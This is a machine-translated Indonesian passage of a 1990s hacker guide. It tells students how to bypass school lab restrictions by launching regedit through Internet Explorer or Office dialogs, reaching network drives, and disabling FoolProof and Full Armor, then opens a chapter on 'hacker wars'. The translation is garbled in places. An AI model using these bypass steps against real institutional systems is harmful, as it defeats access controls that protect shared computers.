Panduan ini akan memberi Anda beberapa tips untuk membuktikan dengan baik seberapa baik diri Anda, dan bahkan mungkin
terlihat
guru peretas teman Anda satu atau dua hal. Tapi saya akan merasa sangat buruk jika seseorang menggunakan tips ini
Panduan ini mengacaukan hidupnya.
************************************************ **********
Anda dapat mengacaukan peringatan hidup Anda: Di kebanyakan negara anak-anak hampir tidak memiliki perlindungan hukum
itu
orang dewasa. Jika Anda terlibat dalam geng peretas di sekolah dan kalian ketahuan, Anda bisa dengan mudah mendapatkannya
dikeluarkan dari sekolah atau bahkan ditangkap. Bahkan jika pihak berwenang tidak memiliki bukti yang sangat baik tentang
kesalahan Anda. Bahkan
jika Anda tidak bersalah. Arghhh!
************************************************ **********
Maka, tugas pertama dari Panduan ini adalah bagaimana menemukan guru yang suka bermain game hacker dengan Anda dan
memberi Anda menjalankan sistem komputer sekolah secara gratis. Whoa, katamu, sekarang ini adalah rekayasa sosial
tantangan! Tapi sebenarnya ini tidak terlalu sulit.
Coyote menyarankan, “dalam banyak kasus Anda mungkin menemukan bahwa jika Anda membuktikan diri Anda bertanggung
jawab (yaitu: tidak bertindak seperti a
brengsek di kelas dan tidak peretasan untuk menjadi keren), akan lebih mudah untuk mendapatkan kepercayaan dari guru dan
selanjutnya
dapatkan pekerjaan dengan membantu sistem. Dan begitu Anda mencapai level ini, Anda hampir dijamin
akan tahu lebih banyak tentang
manajemen sistem, dan tentu saja peretasan, daripada yang bisa Anda lakukan dengan sederhana
menerobos masuk. "
Inilah hal pertama yang perlu Anda ingat. Guru Anda terlalu banyak bekerja. Jika mereka marah pada peretas, itu benar
karena pengacau komputer terus mengacaukan segalanya. Tebak siapa yang harus lembur di tempat kerja memperbaiki
kekacauan
siswa membuat ketika mereka masuk ke komputer sekolah? Benar, biasanya guru lab komputer Anda.
Pikirkan tentang itu. Guru lab komputer Anda mungkin benar-benar menyukai ide meminta Anda membantu
kerja. Masalahnya adalah - apakah mereka berani mempercayai Anda?
Karl Schaffarczyk memperingatkan, “Saya hampir dikeluarkan dari sekolah (bertahun-tahun yang lalu) karena menarik DOS
prompt
pada sistem yang dilindungi terhadap hal-hal seperti itu. "Sheesh, hanya untuk mendapatkan DOS prompt? Tetapi
Masalahnya adalah bahwa guru Anda melakukan banyak upaya untuk menyiapkan komputer sekolah sehingga mereka dapat
digunakan untuk mengajar
kelas. Begitu mereka sadar Anda tahu cara menuju ke DOS, mereka tahu Anda bisa mengacaukan semuanya
mereka harus menghabiskan malam tanpa tidur - atau dua atau tiga - menyatukan komputer itu kembali. Guru
benci tidur semalaman. Bayangkan itu!
Jadi, jika Anda benar-benar ingin membuat kesepakatan di mana Anda menjadi penguasa tertinggi dan pahlawan di sekolah Anda
komputer, jangan mulai dengan tertangkap! Jangan mulai dengan menunjukkan pada gurumu, “Hei, lihat betapa mudahnya
adalah untuk mendapatkan DOS prompt! ”Ingat, beberapa otoritas akan segera mengeluarkan Anda dari sekolah atau menelepon
polisi.
Jujur, banyak orang takut akan peretas remaja. Anda juga tidak bisa menyalahkan mereka saat melakukannya
pertimbangkan kisah-kisah berita itu. Berikut adalah beberapa contoh cerita yang mungkin dibaca oleh otoritas sekolah Anda.
- 13 FEBRUARI 1997 Peretas dilaporkan menggunakan server di Southampton University untuk bersirkulasi
mengancam email (yang) ... menginstruksikan penerima untuk membatalkan kartu kredit, mengklaim keamanan mereka telah
dilanggar.
(c) VNU Business Publications Limited, 1997
BERITA JARINGAN 7/5/97 P39 Seorang remaja didenda setara dengan US $ 350 karena melumpuhkan telepon AS
switchboards ... Remaja yang tidak disebutkan namanya melakukan sekitar 60.000 panggilan ...
(C) 1997 M2 Communications Ltd.
TELECOMWORLDWIRE 6/5/97

Halaman 197
WORLDCOM di Inggris baru-baru ini mengalami kegagalan sistem setelah serangan hacker ...
(C) 1997 M2 Communications Ltd.
TELECOMWORLDWIRE 6/5/97
Menakutkan, ya? Tidak mengherankan bahwa saat ini beberapa orang begitu takut pada peretas sehingga mereka hampir
menyalahkan
apapun pada kita. Sebagai contoh, pada tahun 1997, pihak berwenang di pangkalan angkatan laut pada awalnya menyalahkan
penyerang menggunakan energi tinggi
gelombang radio untuk layar komputer yang membeku. Kemudian para penyelidik mengetahui bahwa radar kapal, bukan peretas,
adalah
layar beku.
Jadi alih-alih marah pada guru yang takut pada peretas, beri mereka kesempatan. Media adalah
membanjiri mereka dengan cerita-cerita yang menakutkan. Plus yang mereka mungkin menghabiskan banyak waktu
memperbaiki kekacauan yang dibuat oleh
peretas kiddie. Tugas Anda adalah menunjukkan kepada mereka bahwa Anda adalah pria yang baik. Tugas Anda adalah
menunjukkan kepada mereka bahwa Anda dapat membuatnya
hidup lebih baik untuk mereka dengan memberi Anda menjalankan komputer sekolah gratis.
Teknik dasar yang sama ini juga akan bekerja dengan ISP Anda.
Jika Anda menawarkan bantuan secara gratis, dan jika Anda meyakinkan mereka bahwa Anda bertanggung jawab, Anda bisa
mendapatkan hak untuk mendapatkan root
(atau administratif) akses ke hampir semua sistem komputer. Sebagai contoh, saya sedang berbicara dengan pemilik
ISP suatu hari, yang mengeluh bagaimana dia bekerja terlalu keras. Saya mengatakan kepadanya bahwa saya kenal seorang
mahasiswa tahun kedua sekolah menengah yang pernah
telah ditangkap karena peretasan tetapi telah direformasi. Orang ini, saya berjanji, akan bekerja secara gratis dengan imbalan
root password pada salah satu kotaknya. Hari berikutnya mereka melakukan transaksi.
Sekarang peretas ini dan teman-temannya bisa memainkan game pembobolan di komputer ini selama jam-jam libur saat
membayar
pelanggan tidak menggunakannya. Sebagai gantinya, anak-anak itu memperbaiki apa pun yang salah dengan kotak itu.
Jadi cobalah. Temukan guru yang bekerja terlalu keras. Atau pemilik ISP yang terlalu banyak bekerja. Tawarkan untuk
menunjukkan kepadanya bahwa Anda
cukup tahu untuk membantu merawat komputer-komputer itu.
Tetapi bagaimana Anda membuktikan bahwa Anda cukup tahu untuk pekerjaan itu?
Jika Anda memulai dengan memberi tahu guru lab komputer Anda bahwa Anda tahu cara membobol komputer sekolah,
beberapa guru akan merasa senang dan menangguhkan Anda dari sekolah. Untuk jaga-jaga jika guru Anda adalah orang yang
dapat
takut dengan semua berita hacker berita itu, jangan mulai dengan berbicara tentang menerobos masuk! Sebaliknya, mulailah
dengan
menunjukkan kepada mereka, dengan izin mereka, beberapa trik murah.
Trik Internet Explorer Murah
Tempat yang baik untuk memulai adalah dengan Internet Explorer.
Sebagai permulaan, apa yang bisa lebih berbahaya - namun efektif dalam memamerkan bakat Anda - daripada mengubah
logo animasi di IE (IE) dan Netscape?
Anda bisa melakukannya dengan cara mudah dengan Microangelo, tersedia dari
ftp://ftp.impactsoft.com/pub/impactsoft/ma21.zip. Tetapi karena Anda adalah seorang peretas, Anda mungkin ingin membuatnya
terkesan
guru dengan melakukannya dengan cara hacker.
1) Membawa Cat.
2) Klik "gambar," lalu "atribut."
3) Pilih lebar = 40, tinggi = 480, satuan dalam pel.
4) Buat serangkaian gambar, masing-masing pel 40x40. Salah satu cara untuk melakukan ini adalah membuka gambar baru untuk
masing-masing dan
atur atribut ke width = 40 dan height = 40. Kemudian potong dan rekatkan masing-masing ke dalam gambar 40x480.
5) Jadikan gambar 40x40 teratas menjadi yang Anda inginkan di sana ketika IE tidak melakukan apa-apa. Tiga berikutnya
ditampilkan satu kali saat unduhan dimulai, dan sisanya diputar secara berulang hingga unduhan selesai. Kamu
harus memiliki jumlah gambar yang genap agar dapat berfungsi.

Halaman 198
6) Sekarang jalankan editor Registry. Ini disembunyikan dengan baik karena Microsoft lebih suka Anda tidak bermain dengan
Daftar. Salah satu caranya adalah dengan mengklik "mulai," lalu "program" lalu "MS-DOS," dan kemudian di jendela MS-DOS
dengan prompt C: \ windows berikan perintah "regedit."
7) Klik untuk menyorot subkunci "HKEY_CURRENT_USER \ Software \ Microsoft \ IE \ Toolbar"
8) Pada bilah tugas di atas, klik "Edit," lalu "Temukan." Ketik "Brandbitmap" di jendela find.
9) Sekarang klik dua kali pada BrandBitmap untuk mendapatkan jendela dialog. Ketikkan jalur dan nama file kustom Anda
grafik animasi ke dalamnya.
Jadi katakanlah Anda membuat tengkorak menyala yang berputar ketika Anda menjalankan IE. Guru Anda terkesan. Sekarang
dia
ingin Anda mengembalikannya seperti sebelumnya. Ini mudah. Cukup buka BrandBitmap, dan hapus namanya
file animasi Anda. Windows Explorer kemudian akan secara otomatis kembali ke grafik yang disimpan di BackBitmap.
Sekarang mari kita tunjukkan sesuatu yang sedikit menakutkan pada gurumu. Tahukah Anda bahwa Internet Explorer (IE)
dapat digunakan untuk memecahkan beberapa program pengasuh Windows? Sekolah Anda mungkin menjalankan salah satunya.
Jika
Anda memainkan ini dengan benar, Anda dapat memenangkan poin dengan menghancurkan program pengasuh bayi itu.
Ya, Anda bisa mulai mengerjakan program pengasuh anak menggunakan tips GTMHH tentang cara melakukannya
masuk ke Win95. Namun, kami juga akan melihat cara baru untuk menyiasatinya dalam bab ini, menggunakan IE. Itu
Keuntungan menggunakan IE ketika guru Anda dengan cemas melihat dari balik bahu Anda adalah Anda bisa saja
"Tidak sengaja" menemukan sesuatu yang keren, bukannya terlihat seperti peretas berbahaya. Maka Anda bisa menunjukkan
Anda tahu bagaimana memanfaatkan celah keamanan itu.
Selain itu, jika ternyata program keamanan yang Anda coba timpa ditulis dengan cukup baik untuk menjaga IE
Melanggar itu, Anda tidak terlihat seperti boneka.
************************************************ **********
Kiat Genius Jahat: Orang-orang kurang takut pada Anda jika Anda mengetik sloowwwlllllyyyyyyyyyy.
************************************************ **********
Rahasia kecil yang kotor adalah bahwa IE sebenarnya adalah program shell Windows. Itu berarti itu adalah alternatif untuk
Win95 desktop. Dari IE Anda dapat meluncurkan program apa pun. IE beroperasi seperti Manajer Program dan
Windows Explorer yang datang dengan sistem operasi Win 95 dan Win NT.
Ya, dari shell IE Anda dapat menjalankan program apa pun di komputer Anda - kecuali program keamanan Anda
berusaha untuk istirahat telah mengantisipasi serangan ini. Dengan sedikit kecerdikan Anda mungkin bisa mendapatkan kendali
LAN sekolah Anda. Tapi jangan mencobanya dulu!
************************************************ **********
Catatan pemula: Shell adalah program yang memediasi antara Anda dan sistem operasi. Masalah besar tentang
IE menjadi shell Windows adalah bahwa Microsoft tidak pernah mengatakan kepada siapa pun bahwa itu sebenarnya shell.
Keamanan
masalah yang mengganggu IE sebagian besar merupakan konsekuensi dari itu ternyata menjadi sebuah shell. Sebaliknya,
Netscape dan Mosaic Web browser bukan shell dengan fitur lengkap. Ini membuat mereka lebih aman untuk digunakan.
Tetapi Anda masih bisa melakukan beberapa hal menarik dengan mereka untuk masuk ke kotak Win95. Bereksperimen dan
bersenang-senanglah!
************************************************ **********
Untuk menggunakan IE sebagai shell Win95, bawalah ke atas seperti yang Anda lakukan jika Anda ingin menjelajahi Web. Jika
Anda
komputer diatur untuk secara otomatis memulai koneksi Internet, Anda dapat mematikannya. Anda tidak perlu online
agar ini bekerja.
Sekarang, inilah beberapa saran yang menyenangkan. Di ruang di mana Anda biasanya mengetikkan URL yang Anda inginkan
berselancar, sebagai gantinya ketik c :.

Halaman 199
Wah, lihat semua folder file yang muncul di layar. Sekarang untuk bersenang-senang, klik "Program Files" lalu klik
"Aksesoris" lalu klik "Paint." Tiba-tiba Paint sedang berjalan. Sekarang lukis gurumu yang sedang menonton
Peretasan ini mengejutkan.
Selanjutnya tutup semua hal itu dan kembali ke jendela URL di IE. Klik pada folder Windows, lalu klik
Regedit.exe untuk memulainya. Ekspor file kata sandi (ada di HKEY_CLASSES_ROOT). Buka di Word Pad.
Ingat, kemampuan untuk mengendalikan Registry server adalah kunci untuk mengendalikan jaringan yang dilayaninya.
Perlihatkan ini kepada guru Anda dan katakan padanya bahwa Anda akan menggunakan IE untuk mengubah semua file kata
sandi sekolah.
Dalam beberapa jam, Secret Service akan bertarung dengan FBI di halaman depan Anda tentang siapa yang akan mencoba
menangkapmu. OK, hanya bercanda di sini.
Tidak, mungkin akan sedikit lebih baik untuk memberi tahu guru Anda bahwa jika Anda dapat mengedit registri, Anda bisa
mendapatkan total
kontrol atas komputer itu. Dan mungkin lebih banyak. Sarankan agar sekolah menghapus IE dari semua komputernya.
Anda berada di jalan untuk menjadi pahlawan.
Jika Anda benar-benar mengedit Registry, Anda sebaiknya tahu cara mengembalikan ke cadangannya, atau membatalkan
perubahan. Kalau tidak, Anda akan membuat lebih banyak pekerjaan untuk guru lab komputer daripada bekerja lebih sedikit.
Ingat, tujuannya adalah untuk membuktikan kepada guru Anda bahwa Anda dapat memotong berapa banyak pekerjaan yang
harus mereka lakukan!
Bagaimana jika program pengasuh sekolah tidak membiarkan Anda menjalankan regedit.exe? Coba ketikkan c: /command.com.
Kemudian lihat
Bab 2 untuk cara mengedit Registry dari DOS.
Jika Anda sudah sejauh ini dengan IE, selanjutnya coba masukkan r: / atau w: / atau z: dll untuk melihat apakah Anda dapat
mengakses disk dari
server jaringan. Pastikan untuk melakukan ini dengan guru Anda menonton dan dengan izinnya untuk mencoba mengakses
komputer jaringan. Jika Anda berhasil, sekarang Anda memiliki alasan yang sangat bagus untuk memintanya melepaskan IE
komputer sekolah. Ini karena Anda baru saja mengambil alih seluruh LAN sekolah. Tapi kamu adalah pahlawan
karena Anda telah melakukannya untuk menyelamatkan sekolah Anda dari para peretas kiddie jahat yang mengubah nilai dan
kelas
tugas.
Sekarang Anda memiliki kesempatan besar dalam mendapatkan pekerjaan sukarela yang menjalankan sistem komputer sekolah.
Sebelum
Anda tahu itu, Anda dan teman-teman Anda akan secara terbuka bermain Gempa di sekolah - dan pihak berwenang akan
mempertimbangkan
itu harga kecil untuk membayar keahlian Anda.
Trik Murah dengan Microsoft Office
Anda juga dapat menjalankan shell Windows dari beberapa program Microsoft Office. Ingat, begitu Anda mendapatkan shell,
Anda memiliki peluang bagus untuk menonaktifkan program keamanan.
Eksploitasi berikut ini berfungsi dengan Microsoft Word, Excel, dan Powerpoint. Untuk menggunakannya masuk ke Windows
kulit:
1) Klik "bantuan", lalu "Tentang Microsoft (nama program yang disisipkan di sini)," lalu "Info Sistem ..."
2) Ini memunculkan jendela yang mencakup tombol berlabel "run." Klik "run" dan masukkan apa pun yang Anda
inginkan, misalnya regedit.exe! (Yaitu, kecuali program keamanan yang Anda coba hancurkan memiliki cara untuk
melakukannya
nonaktifkan ini.)
Microsoft Access sedikit lebih sulit. Tombol "jalankan" hanya memberikan beberapa pilihan. Salah satunya adalah File Manager.
Tetapi File Manager juga merupakan shell Windows. Dari situ Anda bisa menjalankan program apa saja. (Yaitu, kecuali
keamanan
program yang Anda coba hancurkan memiliki cara untuk menonaktifkan ini.)
Cara Menghindari Kebodohan
Biasanya ada hotkey untuk mematikan FoolProof. Seorang hacker muda melaporkan sekolahnya menggunakan shift-alt-X (tahan
turunkan tombol shift dan alt pada saat yang sama, lalu tekan tombol "x".) Tentu saja sekolah lain mungkin memiliki
pengaturan lainnya.

Halaman 200
Jika Anda menggunakan tombol pintas dengan benar, suara dapat diputar, dan kunci di sudut kanan bawah akan terbuka untuk
20-30
detik.
Dante menceritakan bagaimana ia berhasil keluar dari hot spot dengan hack Fool Proof yang lebih baik. "Komputer saya
guru sains meminta saya untuk menunjukkan kepadanya persis BAGAIMANA saya berhasil mencetak 'alam semesta berputar
saya gambar saya buat untuk semua printer jaringan di sekolah ... "Jadi dia punya arlojinya saat dia melakukan perbuatan itu.
************************************************ **********
Anda bisa mendapatkan pukulan di hidung: Dante beruntung bahwa gurunya mengerti. Dalam beberapa
sekolah lelucon yang tidak berbahaya seperti ini akan menjadi alasan pengusiran.
************************************************ **********
Inilah cara Dante - dan siapa saja - dapat menonaktifkan FoolProof.
1) Pertama, masuk ke kotak Windows menggunakan salah satu teknik GTMHH pada Peretasan Windows.
Peringatan - jangan coba sedikit menyolder. Gurumu akan pingsan.
3) Sekarang Anda dapat mengedit file autoexec.bat dan config.sys. (Pastikan untuk mencadangkannya.) Dalam config.sys hapus
perangkat baris = fp, dan di autoexec.bat, hapus fptsr.exe.
4) Jalankan regedit.exe. Anda juga harus menghapus FoolProof dari Registry. Gunakan fitur pencarian Regedit untuk
temukan referensi untuk Bukti Palsu.
5) Temukan file cadangan Registry dan buat salinan dengan nama yang berbeda untuk berjaga-jaga. Melakukan kesalahan
dengan
Registry dapat menyebabkan kekacauan yang spektakuler!
6) Simpan registri, dan reboot. FoolProof tidak mau dimuat.
7) Untuk mengembalikan semuanya seperti semula, ubah nama file cadangan.
Anda sekarang adalah pakar keamanan pahlawan sekolah.
Cara Mengurangi Armor Lengkap
“Saya berlari melawan program ini 8 bulan lalu di sekolah, mereka
berusaha mencegah orang menulis ke hard drive. Itu disajikan
itu sendiri sebagai tantangan .... selama sekitar 5 menit. "- Dave Manges.
Begini cara Dave memberi tahu kami bahwa dia melakukan perbuatan itu:
1) Dalam properti program ini disebutkan file utas (tidak dapat mengingat nama file) itu
something.vbx
2) OKE ... ini cukup mudah, buka notepad, buka something.vbx
3) Hanya karena saya tidak dapat menulis ke hard drive tidak berarti saya tidak dapat mengedit sesuatu yang sudah ada, hapus
file
karakter pertama dari file.
4) File (dibuka di notepad) terlihat seperti sampah, tetapi jika ingatanku huruf pertama adalah M.
5) Simpan File dan mulai ulang komputer, itu akan muncul dengan kesalahan seperti "Tidak dapat menginisialisasi Penuh
Baja".
6) Sekarang Anda dapat masuk ke tambah / hapus program dan hapus instalannya.
Sekali lagi, ingatlah untuk membuat cadangan semua file sebelum mengubahnya sehingga Anda dapat mengembalikan komputer
ke arah Anda
menemukannya.
Memecahkan Masalah Babysitter Web
Misalkan tujuan kita selanjutnya adalah menyingkirkan program pengasuh Web. Tetapi ini bisa menjadi pekerjaan yang sulit.
Pikirkan tentang itu
dari sudut pandang para guru. Bahkan jika seorang anak mengeluh kepada orang tuanya yang telah dilihatnya
film kotor berjalan di monitor anak lain di lab komputer, sekolah Anda akan berada dalam masalah besar. Begitu
hanya peledakan jalan Anda melalui program pengasuh dengan teknik seperti yang Anda pelajari
Bab 2 akan menyelesaikan masalah hanya untuk waktu yang singkat - dan membuat Anda dan guru Anda dan sekolah Anda
masuk
kesulitan.

Halaman 201
Tetapi sekali lagi Anda bisa menjadi pahlawan. Anda dapat membantu guru-guru Anda menemukan situs-situs Web yang ada
diblokir oleh program pengasuh itu. Mereka mungkin terkejut mengetahui blok itu lebih dari sekadar nakal
foto-foto. Mereka sering secara diam-diam menyensor situs-situs politik tertentu juga.
Jika sekolah Anda menjalankan CYBERsitter, Anda dapat melakukannya. CYBERsitter telah mengenkripsi daftar
situs yang terlarang, termasuk yang memiliki keyakinan politik yang tidak mereka sukai. Tetapi Anda dapat mengunduh program
ke
dekripsi daftar ini di: http://peacefire.org/info/hackTHIS.shtml. (Situs web ini dikelola oleh seorang remaja
organisasi, Peacefire, dikhususkan untuk kebebasan berbicara.)
Ketika guru Anda menemukan agenda politik tersembunyi CYBERsitter, Anda adalah seorang pahlawan. Kecuali, tentu saja,
guru Anda setuju dengan taktik CYBERsitter. Jika demikian, Anda mungkin dapat menemukan guru lain di sekolah Anda
yang akan terkejut oleh CYBERsitter.
Bagaimana dengan sistem pemblokiran situs bawaan IE? Lebih sulit untuk mengungkap apa yang diblok karena itu berhasil
membatasi penampil ke situs web yang memiliki "sertifikat" yang disediakan oleh sejumlah organisasi. Jika sebuah situs
belum berupaya mendapatkan sertifikat, IE dapat mencegah Anda melihatnya.
Tentu saja, setelah membaca Bab 2, Anda dapat dengan cepat menonaktifkan fitur sensor IE. Tapi bukannya melakukan
ini, bagaimana dengan mengarahkan guru Anda ke http://peacefire.org dan biarkan dia mengikuti tautannya? Kemudian
mungkin pihak berwenang di sekolah Anda akan siap untuk bernegosiasi dengan Anda untuk menemukan cara untuk memberi
Anda kebebasan
untuk berselancar tanpa mengeluarkan anak-anak lain di lab komputer atau perpustakaan yang tidak bisa tidak memperhatikan
apa yang mungkin terjadi
di monitor Anda.
Cara Membobol Sepenuhnya Komputer Sekolah
Seperti yang Anda ketahui dari Bab 2, Anda dapat membobol komputer mana pun yang memiliki akses fisik. Itu
Triknya adalah mencari tahu, setelah Anda memiliki kontrol penuh, cara menonaktifkan program apa pun yang memberi Anda
kesulitan
waktu.
Hanya ada beberapa cara yang mungkin untuk menjalankan program ini. Mungkin yang perlu Anda lakukan adalah control-alt-
hapus dan hapus dari daftar program aktif yang muncul.
Jika ini tidak berhasil, jika Anda dapat masuk ke DOS, Anda dapat mengedit file apa pun. Lihat Bab 1 untuk detail bagaimana
semua
cara untuk sampai ke DOS. Atau Anda mungkin hanya perlu mengakses regedit.exe. Anda dapat menjalankannya dari DOS atau,
tergantung pada seberapa baik program masalah Anda, dari Windows.
Setelah Anda dapat mengedit file, yang mungkin perlu Anda ubah adalah autoexec.bat, config.sys, apa saja dengan
ekstensi .pwl atau .lnk, \ windows \ startm ~ 1 \ programs \ startup, dan Registry. Cari garis dengan
nama mencurigakan yang mengingatkan Anda tentang nama program yang ingin Anda nonaktifkan.
************************************************ *********
Anda dapat tertekan di catatan hidung: Tentu saja Anda bisa melakukan sesuatu yang jelas seperti "format c:" dan
instal ulang hanya apa yang Anda inginkan pada kotak itu. Tapi ini akan membuat gurumu pas. Mega cocok. jika kamu mau
untuk menjadi pahlawan, pastikan bahwa Anda selalu dapat mengembalikan komputer sekolah apa pun seperti sebelumnya
meretasnya.
************************************************ *********
Setelah selesai, matikan komputer korban dan nyalakan kembali alih-alih reboot dengan kekuatan
masih menyala. Ini akan menyingkirkan apa pun yang tertinggal dalam RAM yang bisa mengalahkan upaya Anda.
Jauhkan Clueless Kiddie Hacker dari mengacaukan Komputer Sekolah Anda

Halaman 202
Sekarang Anda telah menunjukkan kepada guru Anda bahwa Anda dapat benar-benar menghancurkan semua keamanan di kotak
mana pun
Anda memiliki akses fisik, apa selanjutnya? Apakah Anda hanya meninggalkan guru Anda merasa terpesona dan tak berdaya?
Atau apakah Anda
bantu mereka?
Ada alasan mengapa mereka memiliki sistem keamanan di komputer sekolah Anda. Anda akan kagum sama sekali
hal-hal yang dapat dilakukan oleh pengguna yang ceroboh atau jahat.
Anda dapat membuat sekolah Anda menjadi dunia yang baik dengan menggunakan keterampilan peretasan untuk memperbaiki
berbagai hal sehingga keamanan bekerja
jauh lebih baik. Berikut adalah beberapa tindakan pencegahan dasar yang dapat Anda tawarkan kepada guru Anda untuk
mengunci sekolah
komputer. (Lihat GTMHH tentang cara masuk ke komputer Windows untuk instruksi tentang cara melakukan yang paling
ini.)
1) Nonaktifkan semua kunci boot.
2) Kata sandi CMOS. Jika sudah memiliki kata sandi, ubahlah. Berikan kata sandi baru kepada guru Anda.
3) Hapus semua program yang memungkinkan pengguna untuk masuk ke regedit atau dos.
4) Program yang memungkinkan tombol pintas untuk menghindari keamanan harus diubah, jika mungkin, untuk
menonaktifkannya.
5) Hapus program yang tidak dapat dibuat aman.
6) Jangan buat komputer Win95 dapat mengakses data sensitif pada disk jaringan. (Kata sandi
dapat dengan mudah diambil dan diterjemahkan.)
7) Berusaha sangat, sangat sulit untuk membujuk administrasi sekolah untuk mengganti Win95 dengan WinNT.
Dengan eksperimen Anda akan mengetahui lebih banyak untuk diri sendiri.
Karena Win95 adalah sistem operasi yang sama sekali tidak aman, ini akan menjadi pertempuran yang kalah. Tapi setidaknya
Anda akan bisa
untuk menjaga keamanan sehingga siswa yang menerobos masuk akan cukup tahu untuk tidak melakukan apa pun yang
membawa malapetaka
kebetulan. Adapun peretas sekolah jahat, desah, akan selalu ada kewl d00dz yang berpikir "format c:"
menunjukkan mereka, ahem, kewl d00dz.
Anda mungkin juga memiliki masalah dengan administrator sekolah yang mungkin merasa tidak nyaman untuk mengaturnya
sistem yang aman. Mereka harus berhenti menggunakan banyak program yang mudah. Upgrade ke WinNT akan
biaya uang. Coba jelaskan kepada mereka betapa jauh lebih mudah untuk menjaga mereka dari para peretas hacker
menghancurkan komputer sekolah atau menggunakannya untuk mengunjungi Smut Shack bianca.
Apakah Anda siap untuk mengubah keterampilan meretas Anda menjadi reputasi yang hebat di sekolah? Apakah Anda siap
untuk memiliki
guru lab komputer memohon untuk belajar dari Anda? Apakah Anda siap untuk memiliki sistem komputer sekolah secara
keseluruhan
di bawah kendali Anda - secara hukum? Anda akan, tentu saja, hanya menggunakan trik dari Panduan ini di bawah pengawasan
seorang guru yang mengagumi, kan? Itu pasti lebih menyenangkan daripada pengusiran dan pengadilan remaja!
Isi Volume 4:
Hacker Wars: Fighting the Cybernazis
__________________________________________________________
Panduan untuk (kebanyakan) Hacking Tidak Berbahaya
Vol. 4: Informasi Warfare Series
1: Peretas Perang: Memerangi Cybernazis
__________________________________________________________
Ada perang yang sedang berlangsung di dunia maya. Ini adalah perang antara kekuatan represi dan kita yang
kebebasan harta. Di sisi represi adalah pemerintah yang takut akan kebebasan berbicara yang tidak terhalang

Halaman 203
itulah Internet saat ini - dan beberapa kelompok penjahat komputer yang berani menyebut diri mereka
peretas
Saya lebih suka menyebutnya cybernazis. Mereka adalah keturunan spiritual Nazi Jerman tahun 1930-an,
yang membakar buku-buku dalam kampanye mereka untuk membuat orang-orang Jerman tidak tahu.
Taktik cybernazis saat ini adalah mematikan akun email orang, merusak halaman Web, dan menggunakannya
taktik teror untuk membuat orang-orang ditendang dari penyedia layanan Internet mereka. Dalam beberapa kasus cybernazis juga
menargetkan
korban mereka dengan penipuan kartu kredit besar-besaran, ancaman kematian, dan lebih buruk lagi.
Sejauh ini, para cybernazis telah jauh lebih sukses daripada pemerintah dalam mematikan situs-situs Web
yang mereka tidak setuju, memblokir email, dan membuat orang-orang yang idenya mereka sukai memulai layanan Internet
penyedia layanan.
Ini adalah perang yang menargetkan daftar email Happy Hacker ini sejak kami memulainya pada Agustus 1996. The
cybernazis merasa kami pantas mendapatkan beragam serangan, tidak hanya digital tetapi juga termasuk pemerasan dan ancaman
terhadap mereka yang cukup berani untuk menjadi bagian dari Happy Hacker.
************************************************ ********
Dalam Panduan ini, yang pertama dari Volume Informasi Perang, Anda akan belajar:
· Apa itu perang hacker
· Peretasan halaman web
· Penolakan layanan
· Mengendus
· Rekayasa sosial
· Penyanderaan oleh ISP
· Kerusakan yang bisa dilakukan para pejuang peretas terhadap para pengamat
· Mengapa Anda bisa tertabrak suatu hari
· Cara masuk ke perang hacker (beberapa orang mau!)
· Bagaimana cara agar tidak tertangkap - TIDAK!
· Teknik pertahanan yang tidak melanggar hukum
************************************************ ********
Pertempuran paling serius dalam perang ini terjadi pada 4-21 Oktober 1997. Ini menargetkan Bronc Buster. Selama kursus
dalam pertempuran ini, jericho dan Modify mengirimi saya banyak pesan email yang menjelaskan bahwa Bronc sedang dipukul
karena situs Web berkualitas tinggi (harap Anda dapat menemukannya masih di http://showdown.org) dan miliknya
asosiasi dengan Happy Hacker.
Perang ini meningkat di luar serentetan awal pemalsuan mulai 4 Oktober 1997 yang berusaha membuatnya terlihat
seperti Bronc adalah seorang pedofil mengaku diri, ke dalam perang inti yang mematikan ISP Succeed.net
berkali-kali. Mereka menyerang Succeed.net karena memberi Bronc akun shell.
Saya membantu mengumpulkan FBI dan sukarela membantu teknis dari penyedia tulang punggung Internet untuk membantu
Succeed.net dalam perjuangannya melawan para penjahat komputer pendendam ini. Jika Anda juga tertabrak cybernazis,
juga, ceritakan tentang hal itu. Saya akan senang membantu Anda melawan mereka.
************************************************ **********
Saya tidak ingin dituntut sanggahan: Hanya karena jericho dan Modify bertindak sebagai juru bicara para penyerang,
dan dalam kasus Jericho mengklaim pengetahuan yang cukup tentang rincian teknis serangan, tidak berarti
mereka bersalah atas apa pun. Nosirree. Saya tidak mengatakan mereka melakukannya.
************************************************ **********

Halaman 204
Jadi, apakah Anda ingin bergabung dengan kami dalam pertempuran kami melawan para cybernazis itu, melawan mereka yang
mencoba untuk memusnahkan
kebebasan di internet? Ingin mendaftar di sisi orang baik perang informasi? Salah satu caranya adalah belajar
dan mempraktikkan keterampilan bertahan melawan penjahat perang hacker.
Dalam Volume Informasi Warfare Volume 1 GTMHH ini kami hanya akan membahas perang hacker. Tapi sebuah
pemahaman tentang perang hacker akan mempersiapkan Anda untuk No. 2, yang akan membantu Anda melindungi diri dari jauh
lebih luas
serangan yang bahkan dapat menyebabkan 'kematian digital Anda, ”dan No. 3, yang akan meletakkan dasar untuk menjadi
seorang
pejuang perang informasi internasional.
Apa itu Perang Hacker?
Perang peretas adalah upaya untuk merusak orang atau organisasi yang menggunakan dunia maya. Ada beberapa jenis
taktik perang hacker. Dalam Panduan ini kita akan membahas beberapa serangan yang lebih umum.
Peretasan Halaman Web
Banyak orang bertanya kepada saya, "Bagaimana saya meretas halaman Web?" Sayang, pembaca yang lembut, langkah pertama
dalam proses ini
secara fisiologis tidak mungkin dan tidak cocok untuk deskripsi dalam publikasi keluarga.
Peretasan halaman Web tipikal dimulai dengan mendapatkan izin menulis ke file hypertext di server Web
yang telah ditargetkan. Hebatnya, beberapa situs web secara tidak sengaja menawarkan izin tertulis kepada siapa pun (dunia
dapat ditulis)! Jika demikian, yang perlu dilakukan oleh para peretas peretas adalah membuat halaman Web palsu, beri nama
yang sama dengan
halaman yang diinginkan di situs Web untuk dipukul, dan kemudian transfer melalui ftp.
Kalau tidak, biasanya perlu masuk terlebih dahulu ke komputer server Web dan mendapatkan root atau administratif
kontrol.
Halaman web yang diretas biasanya terdiri dari gambar-gambar kotor dan bahasa yang buruk. Saya telah memburu banyak orang
yang diretas
Situs web. Analisis politik yang bijak, tanggapan yang cerdas, dan sindiran yang tajam tidak ada di setiap saya
pernah melihat - dengan pengecualian satu hack di Indonesia oleh pejuang kemerdekaan Timor Timur
kelompok. Mungkin karena mereka mempertaruhkan hidup mereka untuk mengatakannya, mereka membuat perhitungan hack
mereka.
